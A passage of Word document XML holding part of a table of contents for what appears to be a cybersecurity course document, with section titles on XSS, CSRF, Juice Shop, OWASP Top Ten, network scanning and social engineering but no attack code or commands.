              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A0E1807" w14:textId="3ABA8718" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553344" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553344 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59BC7ED6" w14:textId="598BDBD6" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553345" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553345 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F5ABDB9" w14:textId="0FDC19C2" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553346" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553346 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="472D1DDA" w14:textId="5D1C9CDF" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553347" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – High Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553347 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28DEFE27" w14:textId="107D5EA8" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553348" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553348 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DC8DC5D" w14:textId="2DBD9058" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553349" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553349 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DBA861E" w14:textId="3D349F6C" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553350" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553350 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27B81ECB" w14:textId="18F70DE9" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553351" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553351 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D8208D1" w14:textId="380AE841" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553352" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Juice Shop</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553352 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6099272B" w14:textId="4D9B78B5" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553353" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Top Ten</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553353 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E809661" w14:textId="4FA7DAE3" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553354" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Network Security (week 5-8)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553354 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5615E772" w14:textId="4FFA5920" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553355" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 5.1 (Network Scanning and Enumeration + Sniffing)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553355 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="215CE2F2" w14:textId="1D1903D9" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553356" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 5.2 (Footprinting, Reconnaissance and Social Engineering)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553356 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="037B324A" w14:textId="6F1203D0" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553357" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Security Concepts (week 9-10)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553357 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2844E23A" w14:textId="38CE9D39" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553358" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Self-Study</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553358 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75A79E63" w14:textId="06482A2E" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
